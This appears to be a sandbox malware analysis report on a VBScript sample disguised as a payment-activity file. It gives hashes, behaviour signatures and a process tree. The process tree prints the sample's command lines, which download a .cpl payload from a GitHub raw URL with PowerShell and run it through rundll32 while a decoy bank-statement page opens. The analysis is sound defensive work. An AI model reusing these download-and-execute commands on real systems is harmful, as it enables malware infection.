Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30/03/2025, 18:36
Static task
static1
Behavioral task
behavioral1
Sample
Payment_Activity_0037_2025-3-30.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Payment_Activity_0037_2025-3-30.vbs
Resource
win10v2004-20250314-en
General
-
Target
Payment_Activity_0037_2025-3-30.vbs
-
Size
13KB
-
MD5
257ea8ae99c0f328251eecebbb3c4301
-
SHA1
0f6c115c4169c73269ee17955cd6858f71bd9b45
-
SHA256
0d69c127cf01104b06b3407364bbd1c04ae5b6a831317b58d835c50ff9a0468c
-
SHA512
631c1e004e71412b05bf1fb919d26d303a16c3cfbc5bf5e0fdf44533fbd8e47e4cd1ad1e00a39dfd038c51eceaf6bb19404eca49756a657b623b4acccda37b71
-
SSDEEP
192:NB0v8qa258i+nxp2YXBoN8x6kgqDMOhWm3Gmim3jzVcGZlIyB1AQaAMKz3N2v:3qyiAdxoY6HyLjpLZlIyUQanKzN2v
Malware Config
Signatures
-
pid Process 2712 powershell.exe 2556 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1468 rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2712 powershell.exe 2556 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2712 powershell.exe Token: SeDebugPrivilege 2556 powershell.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 2404 wrote to memory of 2788 2404 WScript.exe 31 PID 2404 wrote to memory of 2788 2404 WScript.exe 31 PID 2404 wrote to memory of 2788 2404 WScript.exe 31 PID 2788 wrote to memory of 2712 2788 cmd.exe 33 PID 2788 wrote to memory of 2712 2788 cmd.exe 33 PID 2788 wrote to memory of 2712 2788 cmd.exe 33 PID 2404 wrote to memory of 2828 2404 WScript.exe 34 PID 2404 wrote to memory of 2828 2404 WScript.exe 34 PID 2404 wrote to memory of 2828 2404 WScript.exe 34 PID 2828 wrote to memory of 2556 2828 cmd.exe 36 PID 2828 wrote to memory of 2556 2828 cmd.exe 36 PID 2828 wrote to memory of 2556 2828 cmd.exe 36 PID 2404 wrote to memory of 1352 2404 WScript.exe 37 PID 2404 wrote to memory of 1352 2404 WScript.exe 37 PID 2404 wrote to memory of 1352 2404 WScript.exe 37 PID 2404 wrote to memory of 2400 2404 WScript.exe 39 PID 2404 wrote to memory of 2400 2404 WScript.exe 39 PID 2404 wrote to memory of 2400 2404 WScript.exe 39 PID 2400 wrote to memory of 1112 2400 cmd.exe 41 PID 2400 wrote to memory of 1112 2400 cmd.exe 41 PID 2400 wrote to memory of 1112 2400 cmd.exe 41 PID 1352 wrote to memory of 1468 1352 cmd.exe 42 PID 1352 wrote to memory of 1468 1352 cmd.exe 42 PID 1352 wrote to memory of 1468 1352 cmd.exe 42 PID 1352 wrote to memory of 1468 1352 cmd.exe 42 PID 1352 wrote to memory of 1468 1352 cmd.exe 42 PID 1352 wrote to memory of 1468 1352 cmd.exe 42 PID 1352 wrote to memory of 1468 1352 cmd.exe 42 PID 1468 wrote to memory of 1292 1468 rundll32.exe 43 PID 1468 wrote to memory of 1292 1468 rundll32.exe 43 PID 1468 wrote to memory of 1292 1468 rundll32.exe 43 PID 1468 wrote to memory of 1292 1468 rundll32.exe 43
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment_Activity_0037_2025-3-30.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement2⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://raw.githubusercontent.com/SC10001/Di/main/DNSBackup.cpl -Outfile C:\ProgramData\DNSBackup\DNSBackup.cpl2⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri https://raw.githubusercontent.com/SC10001/Di/main/DNSBackup.cpl -Outfile C:\ProgramData\DNSBackup\DNSBackup.cpl3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\SysWOW64\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl2⤵
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl4⤵PID:1292
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl2⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl3⤵PID:1112
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5441fc5bb98ed1177082d1b494d73e48f
SHA195ad7168600b3a479a288ecd7b3429ea7ef97279
SHA256ebcc77f97426e3a8b93c06e7cc72cc97ea015b36c8a27c135970be772abb63e3
SHA512c06539ce35afdff6fd3478888e2c5fb9870eed9275a1c21bb447d51838924c550e8b4b3b439ab9b66735a4b081232a9841e54ee8841b8bb62dcf229e2bf798c6